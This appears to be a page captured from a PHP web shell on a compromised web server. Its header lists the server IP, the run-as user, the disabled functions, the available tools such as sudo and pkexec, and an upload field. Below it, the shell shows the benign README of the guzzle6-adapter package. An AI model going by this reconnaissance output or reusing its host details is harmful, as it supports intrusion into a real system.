| Server IP : 103.161.17.216 / Your IP : 216.73.216.1 Web Server : nginx/1.18.0 System : Linux tipsysaigoncharming 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/app.ansachsongkhoe.net/vendor/php-http/guzzle6-adapter/ |
Upload File : |
# Guzzle 6 HTTP Adapter [](https://github.com/php-http/guzzle6-adapter/releases) [](LICENSE) [](https://travis-ci.org/php-http/guzzle6-adapter) [](https://scrutinizer-ci.com/g/php-http/guzzle6-adapter) [](https://scrutinizer-ci.com/g/php-http/guzzle6-adapter) [](https://packagist.org/packages/php-http/guzzle6-adapter) **Guzzle 6 HTTP Adapter.** **Note for PHP 8**: This adapter can now be installed with PHP 8, even though Guzzle 6 is not tested on PHP 8. If you need a PSR-18 client, use Guzzle 7 which natively implements PSR-18. If you need the HTTPlug interfaces for asynchronous calls or for a system that still requires HTTPlug, use the [guzzle7-adapter](https://github.com/php-http/guzzle7-adapter/) instead of this repository. ## Install Via Composer ``` bash $ composer require php-http/guzzle6-adapter ``` ## Documentation Please see the [official documentation](http://docs.php-http.org/en/latest/clients/guzzle6-adapter.html). ## Testing First launch the http server: ```bash $ ./vendor/bin/http_test_server > /dev/null 2>&1 & ``` Then the test suite: ``` bash $ composer test ``` ## Contributing Please see our [contributing guide](http://docs.php-http.org/en/latest/development/contributing.html). ## Security If you discover any security related issues, please contact us at [security@php-http.org](mailto:security@php-http.org). ## Credits Thanks to [David de Boer](https://github.com/ddeboer) for implementing this adapter. ## License The MIT License (MIT). Please see [License File](LICENSE) for more information.